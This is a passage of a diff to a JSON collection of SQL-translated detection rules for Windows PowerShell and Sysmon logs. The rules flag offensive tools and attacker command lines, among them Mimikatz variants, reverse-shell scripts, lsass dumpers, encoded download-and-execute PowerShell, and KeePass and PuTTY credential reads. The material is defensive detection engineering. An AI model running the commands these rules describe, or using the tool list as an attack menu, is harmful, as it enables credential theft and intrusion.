ContextInfo LIKE '%Invoke-ACLScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ADSBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-AmsiBypass.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ARPScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BackdoorLNK.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BadPotato.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BetterSafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BruteForce.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Carbuncle.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Certify.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ConPtyShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialsPhish.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DAFT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DCSync.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Decode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DinvokeKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DllInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DowngradeAccount.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EgressCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Encode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EventViewer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Eyewitness.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-FakeLogonScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Farmer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Get-RBCD-Threaded.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Gopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper2.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper3.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-HandleKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Interceptor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Internalmonologue.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Inveigh.ps1%' ESCAPE '\\' OR ContextInfo 
LIKE '%Invoke-InveighRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRegsvr.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRundll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelayUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-LdapSignCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Lockless.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MalSCCM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MimikatzWDigestDowngrade.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikittenz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MITM6.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NanoDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetRipper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetworkRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NinjaCopy.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-OxidResolver.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshellx86.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Paranoia.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PortScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttps.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PostExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellIcmp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTCP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLineBind.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerThIEf.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PPLDump.ps1%' 
ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Prasadhak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcatAgent.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PSInject.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsUaCme.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReflectivePEInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReverseDNSLookup.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Rubeus.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-RunAs.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SauronEye.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SCShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Seatbelt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ServiceAbuse.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SessionGopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ShellCode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SMBScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Snaffler.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Spoolsample.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSHCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSIDExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StandIn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StickyNotesExtract.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tater.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Thunderfox.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ThunderStruck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TokenManipulation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tokenvator.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TotalExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UrbanBishop.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UserHunter.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-VoiceTroll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Whisker.ps1%' ESCAPE '\\' OR ContextInfo 
LIKE '%Invoke-WinEnum.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-winPEAS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WireTap.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WmiCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WScriptBypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Zerologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Keylogger.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%MailRaider.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%New-HoneyHash.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%OfficeMemScraper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Offline\\_Winpwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-CHM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-DnsTxt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Excel.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-HTA.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Java.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-JS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Minidump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-RundllCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCF.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Shortcut.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-WebQuery.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Word.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Parse\\_Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Port-Scan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerBreach.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%powercat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerRunAsSystem.psm1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerSharpPack.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUpSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerView.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PSAsyncShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%RemoteHashRetrieval.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-PoshRat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Update.ps1%' ESCAPE '\\' 
OR ContextInfo LIKE '%Run-EXEonRemote.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Schtasks-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-DCShadowPermissions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-MacAttribute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemotePSRemoting.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemoteWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-Wallpaper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Show-TargetScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Speak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-CaptureServer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-WebcamRecorder.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%StringToBase64.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%TexttoExe.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%VolumeShadowCopyTools.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WinPwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WSUSpendu.ps1%' ESCAPE '\\') OR (ContextInfo LIKE '%Invoke-Sharp%' ESCAPE '\\' AND ContextInfo LIKE '%.ps1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%SC Scheduled Scan%' ESCAPE '\\' AND CommandLine LIKE '%\\\\microsoft\\\\Taskbar\\\\autoit3.exe%' ESCAPE '\\') OR (Image LIKE '%\\\\Windows\\\\Temp\\\\DB\\\\%' ESCAPE '\\' AND Image LIKE '%.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\Service.exe' ESCAPE '\\' AND (CommandLine LIKE '%i%' ESCAPE '\\' OR CommandLine LIKE '%u%' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\local\\\\microsoft\\\\Taskbar\\\\autoit3.exe' ESCAPE '\\' AND CommandLine LIKE '%nslookup.exe%' ESCAPE '\\' AND CommandLine LIKE '%-q=TXT%' ESCAPE '\\')))" ], - "filename": "posh_pm_exploit_scripts.yml" + "filename": "proc_creation_win_apt_oilrig_mar18.yml" }, { - "title": "Potential Active Directory Enumeration Using AD Module - PsModule", - "id": "74176142-4684-4d8a-8b0a-713257e7df8e", - "status": "experimental", - "description": "Detects usage of the \"Import-Module\" cmdlet to load the 
\"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "title": "Operation Wocao Activity", + "id": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", + "status": "test", + "description": "Detects activity mentioned in Operation Wocao report", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ - "attack.reconnaissance", "attack.discovery", - "attack.impact" + "attack.t1012", + "attack.defense_evasion", + "attack.t1036.004", + "attack.t1027", + "attack.execution", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Administrators that use checkadmin.exe tool to enumerate local administrators" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Import-Module %' ESCAPE '\\' OR Payload LIKE '%ipmo %' ESCAPE '\\') AND Payload LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%checkadmin.exe 127.0.0.1 -all%' ESCAPE '\\' OR CommandLine LIKE '%netsh advfirewall firewall add rule name=powershell dir=in%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c powershell.exe -ep bypass -file c:\\\\s.ps1%' ESCAPE '\\' OR CommandLine LIKE '%/tn win32times /f%' ESCAPE '\\' OR CommandLine LIKE '%create win32times binPath=%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\windows\\\\system32\\\\devmgr.dll%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass -enc JgAg%' ESCAPE '\\' OR CommandLine LIKE '%type %keepass\\\\KeePass.config.xml%' ESCAPE '\\' OR CommandLine LIKE '%iie.exe iie.txt%' ESCAPE '\\' OR CommandLine LIKE '%reg query HKEY\\_CURRENT\\_USER\\\\Software\\\\%\\\\PuTTY\\\\Sessions\\\\%' ESCAPE '\\'))" 
], - "filename": "posh_pm_active_directory_module_dll_import.yml" + "filename": "proc_creation_win_apt_wocao.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific - PowerShell Module", - "id": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", - "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", + "title": "CMSTP UAC Bypass via COM Object Access", + "id": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", + "status": "stable", + "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", + "author": "Nik Seetharaman, Christian Burkard (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Unknown" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-noni%' ESCAPE '\\' AND ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-ep%' ESCAPE '\\' AND ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-Enc%' ESCAPE 
'\\') OR (ContextInfo LIKE '%powershell%' ESCAPE '\\' AND ContextInfo LIKE '%reg%' ESCAPE '\\' AND ContextInfo LIKE '%add%' ESCAPE '\\' AND ContextInfo LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-noprofile%' ESCAPE '\\' AND ContextInfo LIKE '%-windowstyle%' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%new-object%' ESCAPE '\\' AND ContextInfo LIKE '%system.net.webclient%' ESCAPE '\\' AND ContextInfo LIKE '%.download%' ESCAPE '\\') OR (ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\' AND ContextInfo LIKE '%Net.WebClient%' ESCAPE '\\' AND ContextInfo LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ContextInfo LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}%' ESCAPE '\\') AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "posh_pm_susp_invocation_specific.yml" + "filename": "proc_creation_win_uac_bypass_cmstp_com_object_access.yml" }, { - "title": "PowerShell Get Clipboard", - "id": "4cbd4f12-2e22-43e3-882f-bff3247ffb78", + "title": "Suspicious Schtasks From Env Var Folder", + "id": "81325ce1-be01-4250-944f-b4789644556f", "status": "experimental", - "description": 
"A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1115" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "Benign scheduled tasks creations or executions that happen often during software installations", + "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-Clipboard%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\')) OR (ParentCommandLine LIKE '%\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND (CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%/Create /TN TVInstallRestore /TR%' ESCAPE '\\') OR ParentCommandLine 
LIKE '%unattended.ini%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /Xml \"C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\.CR.%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_Security\\_Installation.xml%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /F /TN%' ESCAPE '\\' AND CommandLine LIKE '%/Xml %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_%' ESCAPE '\\' AND (CommandLine LIKE '%.tmp\\\\UpdateFallbackTask.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\WatchdogServiceControlManagerTimeout.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\SystrayAutostart.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\MaintenanceTask.xml%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/Create /TN \"klcp\\_update\" /XML %' ESCAPE '\\' AND CommandLine LIKE '%\\\\klcp\\_update\\_task.xml%' ESCAPE '\\')))" ], - "filename": "posh_pm_get_clipboard.yml" + "filename": "proc_creation_win_schtasks_env_folder.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", - "id": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", + "title": "Finger.exe Suspicious Invocation", + "id": "af491bca-e752-4b44-9c86-df5680533dbc", "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", + "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Admin activity (unclear what they do nowadays with finger.exe)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN 
('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'finger.exe' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_finger_usage.yml" }, { - "title": "Clear PowerShell History - PowerShell Module", - "id": "f99276ad-d122-4989-a09a-d00904a5f9d2", - "status": "experimental", - "description": "Detects keywords that could indicate clearing PowerShell history", - "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "title": "HackTool - Dumpert Process Dumper Execution", + "id": "2704ab9e-afe2-4854-a3b1-0c0706d03578", + "status": "test", + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.003" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Very unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (((Payload LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND Payload LIKE '%–HistorySaveStyle%' ESCAPE '\\' AND Payload LIKE '%SaveNothing%' ESCAPE '\\') OR (Payload LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND Payload LIKE '%-HistorySaveStyle%' ESCAPE '\\' AND Payload LIKE '%SaveNothing%' ESCAPE '\\')) OR ((Payload LIKE '%del%' ESCAPE '\\' OR Payload LIKE '%Remove-Item%' ESCAPE '\\' OR Payload LIKE '%rm%' ESCAPE '\\') AND Payload LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Hashes LIKE '%09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR CommandLine LIKE '%Dumpert.dll%' ESCAPE '\\'))" ], - "filename": "posh_pm_clear_powershell_history.yml" + "filename": "proc_creation_win_hktl_dumpert.yml" }, { - "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Module", - "id": "daf7eb81-35fd-410d-9d7a-657837e602bb", + "title": "Dism Remove Online Package", + "id": "43e32da2-fdd0-4156-90de-50dfd62636f9", "status": "experimental", - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "description": "Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images", "author": "frack113", "tags": [ - "attack.collection", - "attack.t1074.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Compress-Archive %' ESCAPE '\\' AND ContextInfo LIKE '% -Path %' ESCAPE '\\' AND ContextInfo LIKE '% -DestinationPath %' ESCAPE '\\' AND ContextInfo LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\DismHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%/Online%' ESCAPE '\\' AND ParentCommandLine LIKE '%/Disable-Feature%' ESCAPE '\\') OR (Image LIKE '%\\\\Dism.exe' ESCAPE '\\' AND CommandLine LIKE '%/Online%' ESCAPE '\\' AND CommandLine LIKE '%/Disable-Feature%' ESCAPE '\\')))" ], - "filename": "posh_pm_susp_zip_compress.yml" + "filename": "proc_creation_win_dsim_remove.yml" }, { - "title": "Suspicious Get-ADDBAccount Usage", - "id": "b140afd9-474b-4072-958e-2ebb435abd68", - 
"status": "test", - "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", - "author": "Florian Roth (Nextron Systems)", + "title": "Computer Discovery And Export Via Get-ADComputer Cmdlet", + "id": "435e10e4-992a-4281-96f3-38b11106adde", + "status": "experimental", + "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unknown" + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload 